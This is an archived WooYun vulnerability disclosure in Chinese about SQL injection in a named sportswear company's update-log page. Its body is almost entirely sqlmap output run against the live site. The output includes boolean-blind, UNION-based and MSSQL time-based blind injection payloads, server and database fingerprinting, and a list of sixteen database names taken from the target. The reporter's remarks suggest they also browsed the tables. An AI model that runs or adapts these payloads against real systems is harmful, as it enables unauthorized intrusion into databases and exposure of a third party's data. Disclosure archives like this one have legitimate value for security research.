乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-07: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-02-21: 厂商已经主动忽略漏洞,细节向公众公开
RT
漏洞地址:http://info.peaksport.com//UpdateLog/UpdateList.aspx?LogID=153直接扔SQLMAP跑:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: LogID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: LogID=146 AND 7331=7331 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: LogID=-1347 UNION ALL SELECT 36,36,CHAR(113)+CHAR(120)+CHAR(110)+CHAR(121)+CHAR(113)+CHAR(81)+CHAR(100)+CHAR(66)+CHAR(73)+CHAR(85)+CHAR(107)+CHAR(66)+CHAR(121)+CHAR(70)+CHAR(81)+CHAR(113)+CHAR(102)+CHAR(103)+CHAR(107)+CHAR(113),36-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: LogID=-1678 OR 7864=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)---[14:51:13] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008[14:51:13] [INFO] fetching database names[14:51:13] [INFO] the SQL query used returns 18 entries[14:51:13] [INFO] resumed: "ASPState"[14:51:13] [INFO] resumed: "distmodel"[14:51:13] [INFO] resumed: "ITManage"[14:51:13] [INFO] resumed: "linjin"[14:51:13] [INFO] resumed: "master"[14:51:13] [INFO] resumed: "model"[14:51:13] [INFO] resumed: "msdb"[14:51:13] [INFO] resumed: "NetXMS"[14:51:13] [INFO] resumed: "PeakData"[14:51:13] [INFO] resumed: "PeakData"[14:51:13] [INFO] resumed: "PeakOA"[14:51:13] [INFO] resumed: "ReportServer"[14:51:13] [INFO] resumed: "ReportServerTempDB"[14:51:13] [INFO] resumed: "RunLog"[14:51:13] [INFO] resumed: "tempdb"[14:51:13] [INFO] resumed: "Vip001"[14:51:13] [INFO] resumed: "Vip001"[14:51:13] [INFO] resumed: "ZWKQ"available databases [16]:[*] ASPState[*] distmodel[*] ITManage[*] linjin[*] master[*] model[*] msdb[*] NetXMS[*] PeakData[*] PeakOA[*] ReportServer[*] ReportServerTempDB[*] RunLog[*] tempdb[*] Vip001[*] ZWKQ
太多表了,看得眼花缭乱~~
同上
你懂的
未能联系到厂商或者厂商积极拒绝